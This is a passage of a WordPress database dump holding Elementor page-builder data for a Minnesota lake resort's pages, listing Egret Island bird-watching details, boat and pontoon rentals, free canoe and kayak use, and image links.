23:\"background_color_b_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:25:\"background_gradient_angle\";a:3:{s:4:\"unit\";s:3:\"deg\";s:4:\"size\";i:180;s:5:\"sizes\";a:0:{}}s:15:\"background_xpos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:15:\"background_ypos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:19:\"background_bg_width\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}}'),(2053,778,'_elementor_data','[{\"id\":\"4e75edc\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"75e0b17\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"190ff24\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"e7f7f11\"}]},\"elements\":[{\"id\":\"d12d45f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"e166c4f\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"825f625\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"4ecd425\"}]},\"elements\":[{\"id\":\"bcb8ee8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>EGRET ISLAND SCIENTIFIC AND NATURAL AREA<\\/strong><br \\/>A 34 acre island on Pelican Lake with an egret\\/ heron, one of the largest in Minnesota to protect nesting Herons, Egrets and Cormorants.<br \\/><strong>BEST TIMES TO VISIT<\\/strong>: May through July<br \\/><strong>BIRDS TO LOOK FOR:<\\/strong> Great Blue Heron, Great Egret, Black crowned Night Heron, Bald Eagles and many varieties of waterfall.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"652a9c0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"941a68a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"db1cd2c\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"77f2fe7\"}]},\"elements\":[{\"id\":\"907b353\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8dff2d5\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"13e12df\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"79f88fc\"}]},\"elements\":[{\"id\":\"78339db\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSC0111cropped.jpg\",\"id\":334},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"24a8461\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"277c649\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"2776fcf\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"e46a15c\"}]},\"elements\":[{\"id\":\"35a87df\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSC0528.jpg\",\"id\":337},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"416845e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"f6c85c6\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"e9eb61f\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"2f7e666\"}]},\"elements\":[{\"id\":\"877051d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSC0428.jpg\",\"id\":485}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2afc1af\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"82265b8\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"61556d1\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"879b52c\"}]},\"elements\":[{\"id\":\"183922b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"159b541\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"9c0cb14\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"502233b\"}]},\"elements\":[{\"id\":\"e65066b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.12.40-PM.png\",\"id\":773}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6484ac8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"5b682d2\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"6278ced\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"f10a619\"}]},\"elements\":[{\"id\":\"3611c11\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3645.jpg\",\"id\":357},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3512ca9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"85d8902\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"29fbccb\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"6cd8a18\"}]},\"elements\":[{\"id\":\"a981a86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3607.jpg\",\"id\":356},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a786f0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"a58d1af\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"4ffc419\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"631f271\"}]},\"elements\":[{\"id\":\"61eb0cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"c4c154c\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"9ad33c4\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"92a65b9\"}]},\"elements\":[{\"id\":\"6e7ea21\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3381.jpg\",\"id\":352},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"210e62a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"c9955f8\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"6af7ce6\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"dd4630f\"}]},\"elements\":[{\"id\":\"ea948a0\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSC0971.jpg\",\"id\":338}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ddf3233\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"bab1281\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"ff057f3\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"260fb0c\"}]},\"elements\":[{\"id\":\"f85d395\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN2428.jpg\",\"id\":185},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"df56761\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"5f9df41\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d7d61cf\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"616f81d\"}]},\"elements\":[{\"id\":\"d447070\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"73a82be\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"1d284f6\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"95bad3f\"}]},\"elements\":[{\"id\":\"0b1fe5a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN2438.jpg\",\"id\":186},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"8ff0a4c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9282b83\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"9946c13\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"2df9de4\"}]},\"elements\":[{\"id\":\"efd238a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSC0273.jpg\",\"id\":484}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5b28a00\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"aa717c3\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"a627f24\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"f55fc3f\"}]},\"elements\":[{\"id\":\"33c1da6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3449.jpg\",\"id\":487},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3c310c4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"dc27ce8\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"52c6b37\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"2bc1f34\"}]},\"elements\":[{\"id\":\"136d8d2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"f17526a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"c1f4961\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"1de3965\"}]},\"elements\":[{\"id\":\"953ca0e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.18.18-PM.png\",\"id\":774}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"8665d90\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"0c9f6ba\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"657872e\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"cccb494\"}]},\"elements\":[{\"id\":\"2c32f51\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3325.jpg\",\"id\":486},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"9f8ffe1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"206e371\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"aaed728\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"302f717\"}]},\"elements\":[{\"id\":\"bcb10d3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.19.24-PM.png\",\"id\":775}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(2057,779,'_wp_page_template','default'),(2058,779,'_elementor_edit_mode','builder'),(2059,779,'_elementor_template_type','post'),(2060,779,'_elementor_data','[{\"id\":\"86ecb3f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8a45f64\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"142d45e\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"3d072d4\"}]},\"elements\":[{\"id\":\"7e4ba31\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"84ad9d6\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8aaa860\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"619f46d\"}]},\"elements\":[{\"id\":\"3a53155\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2018\\/04\\/20Foot.png\",\"id\":701},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1ab4587\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">20 foot pontoon With 25 HP Yamaha 4 stroke Rental<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"706d39a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"48d8414\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"c530bfd\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"6edda1c\"}]},\"elements\":[{\"id\":\"9bcae90\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/02\\/DSCN2723.jpg\",\"id\":549},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"84b34fe\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">16 foot Lund Fishing Boat with 15 HP Yamaha Rental<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"34966cb\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"80347fe\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"02046c5\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"1893353\"}]},\"elements\":[{\"id\":\"403ea9b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"b555a73\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"ecce2ec\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"097b1aa\"}]},\"elements\":[{\"id\":\"d260d09\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3711.jpg\",\"id\":494}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ae3529b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">FREE USE OF THE PADDLE BOAT<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"eefc850\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9de916f\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"f334c4c\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"75e0743\"}]},\"elements\":[{\"id\":\"991c5f7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3841.jpg\",\"id\":497}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"340682a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">BOAT LAUNCH ON SITE $ 5.00 ONE TIME CHARGE<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"99b8bc5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"11b94d2\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"da4d017\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"abd79ac\"}]},\"elements\":[{\"id\":\"795afe3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSC04860.jpg\",\"id\":348}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"11200cf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">FREE CANOE AND KAYAK USE TO ALL GUESTS<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"36e1853\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"cbc097a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"6c8184f\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"2ed5a11\"}]},\"elements\":[{\"id\":\"c1238f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"a28b037\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"63eca3b\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"13e791a\"}]},\"elements\":[{\"id\":\"a7630d3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/02\\/DSCN3828.jpg\",\"id\":552}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"017271e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">RENT A PADDLE BOARD<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"fb16710\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"1ccf64d\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"4ce0da8\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"db765d1\"}]},\"elements\":[{\"id\":\"c08c13b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/02\\/DSC0342.jpg\",\"id\":550}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"887e12c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">BOAT LIFT RENTAL<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ad760a4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"71b87fc\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"c7ff68d\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d88c0cd\"}]},\"elements\":[{\"id\":\"e02420b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/02\\/DSCN3462.jpg\",\"id\":551}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"87a5746\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">PLENTY OF BOAT SLIPS AVAILABLE<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89ddcdd\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"4802a00\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"94bd481\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d562f41\"}]},\"elements\":[{\"id\":\"bd63f53\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"65bbf44\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"9c90a3a\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d726c85\"}]},\"elements\":[{\"id\":\"c4fdd4f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>You can rent our 20\' pontoon or a 14 foot Lund with 15 hp motor for a day or week and enjoy fishing all the coves and bays that Pelican Lake has to offer. There is no charge for the use of the kayaks or paddle boat test<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2061,779,'_elementor_version','0.4'),(2063,779,'_elementor_page_settings','a:12:{s:21:\"background_color_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:23:\"background_color_b_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:25:\"background_gradient_angle\";a:3:{s:4:\"unit\";s:3:\"deg\";s:4:\"size\";i:180;s:5:\"sizes\";a:0:{}}s:15:\"background_xpos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:15:\"background_ypos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:19:\"background_bg_width\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}}'),(2065,780,'_wp_page_template','default'),(2066,780,'_elementor_edit_mode','builder'),(2067,780,'_elementor_template_type','post'),(2068,780,'_elementor_data','[{\"id\":\"86ecb3f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8a45f64\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"142d45e\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"3d072d4\"}]},\"elements\":[{\"id\":\"7e4ba31\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"84ad9d6\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8aaa860\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"619f46d\"}]},\"elements\":[{\"id\":\"3a53155\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2018\\/04\\/20Foot.png\",\"id\":701},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1ab4587\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">20 foot pontoon With 25 HP Yamaha 4 stroke 